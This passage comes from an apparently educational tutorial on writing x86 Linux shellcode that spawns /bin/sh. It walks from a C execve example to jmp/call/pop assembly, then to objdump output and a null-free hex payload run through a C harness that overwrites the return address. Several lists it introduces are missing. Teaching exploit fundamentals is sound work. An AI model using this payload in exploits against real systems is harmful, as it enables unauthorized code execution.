Now it's time to write a shellcode to do something a little more useful. For instance, we can write a shellcode to spawn a shell (/bin/sh) and eventually exit cleanly. The simplest way to spawn a shell is using the execve(2) syscall. Let's take a look at its usage from its man page:
EXECVE(2) Linux Programmer's Manual EXECVE(2) NAME execve - execute program SYNOPSIS #include <unistd.h> int execve(const char *filename, char *const argv [], char *const envp[]); DESCRIPTION execve() executes the program pointed to by filename. filename must be either a binary executable, or a script starting with a line of the form "#! interpreter [arg]". In the latter case, the interpreter must be a valid pathname for an executable which is not itself a script, which will be invoked as interpreter [arg] filename. argv is an array of argument strings passed to the new program. envp is an array of strings, conventionally of the form key=value, which are passed as environment to the new program. Both, argv and envp must be terminated by a null pointer. The argument vector and environment can be accessed by the called program's main function, when it is defined as int main(int argc, char *argv[], char *envp[]). [...]
To recap, we need to pass it three arguments:
Therefore, spawning a shell from a C program looks like:
#include <unistd.h> int main() { char *args[2]; args[0] = "/bin/sh"; args[1] = NULL; execve(args[0], args, NULL); }
In the above example we passed to execve(2):
Now let's build it and see it work:
$ gcc -o get_shell get_shell.c $ ./get_shell sh-2.05b$ exit $
Ok, we got our shell! Now let's see how to use this system call in assembler (since there are only three arguments, we can use registers). We immediately have to tackle two problems:
To solve the first problem, we will make our shellcode able to put the null bytes in the right places at run-time. To solve the second problem, instead, we will use relative memory addressing.
The "classic" method to retrieve the address of the shellcode is to begin with a CALL instruction. The first thing a CALL instruction does is, in fact, pushing the address of the next byte onto the stack (to allow the RET instruction to insert this address in EIP upon return from the called function); then the execution jumps to the address specified by the parameter of the CALL instruction. This way we have obtained our starting point: the address of the first byte after the CALL is the last value on the stack and we can easily retrieve it with a POP instruction! Therefore, the overall structure of the shellcode will be:
jmp short mycall ; Immediately jump to the call instruction shellcode: pop esi ; Store the address of "/bin/sh" in ESI [...] mycall: call shellcode ; Push the address of the next byte onto the stack: the next db "/bin/sh" ; byte is the beginning of the string "/bin/sh"
Let's see what it does:
Now we can fill the structure of the shellcode with something useful. Let's see, step by step, what it will have to do:
This is the resulting assenbly code:
jmp short mycall ; Immediately jump to the call instruction shellcode: pop esi ; Store the address of "/bin/sh" in ESI xor eax, eax ; Zero out EAX mov byte [esi + 7], al ; Write the null byte at the end of the string mov dword [esi + 8], esi ; [ESI+8], i.e. the memory immediately below the string ; "/bin/sh", will contain the array pointed to by the ; second argument of execve(2); therefore we store in ; [ESI+8] the address of the string... mov dword [esi + 12], eax ; ...and in [ESI+12] the NULL pointer (EAX is 0) mov al, 0xb ; Store the number of the syscall (11) in EAX lea ebx, [esi] ; Copy the address of the string in EBX lea ecx, [esi + 8] ; Second argument to execve(2) lea edx, [esi + 12] ; Third argument to execve(2) (NULL pointer) int 0x80 ; Execute the system call mycall: call shellcode ; Push the address of "/bin/sh" onto the stack db "/bin/sh"
Now let's extract the opcodes:
$ nasm -f elf get_shell.asm $ ojdump -d get_shell.o get_shell.o: file format elf32-i386 Disassembly of section .text: 00000000 <shellcode-0x2>: 0: eb 18 jmp 1a <mycall> 00000002 <shellcode>: 2: 5e pop %esi 3: 31 c0 xor %eax,%eax 5: 88 46 07 mov %al,0x7(%esi) 8: 89 76 08 mov %esi,0x8(%esi) b: 89 46 0c mov %eax,0xc(%esi) e: b0 0b mov $0xb,%al 10: 8d 1e lea (%esi),%ebx 12: 8d 4e 08 lea 0x8(%esi),%ecx 15: 8d 56 0c lea 0xc(%esi),%edx 18: cd 80 int $0x80 0000001a <mycall>: 1a: e8 e3 ff ff ff call 2 <shellcode> 1f: 2f das 20: 62 69 6e bound %ebp,0x6e(%ecx) 23: 2f das 24: 73 68 jae 8e <mycall+0x74> $
insert them in the C program:
char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46" "\x0c\xb0\x0b\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" "\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; int main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; }
and test it:
$ gcc -o get_shell get_shell.c $ ./get_shell sh-2.05b$ exit $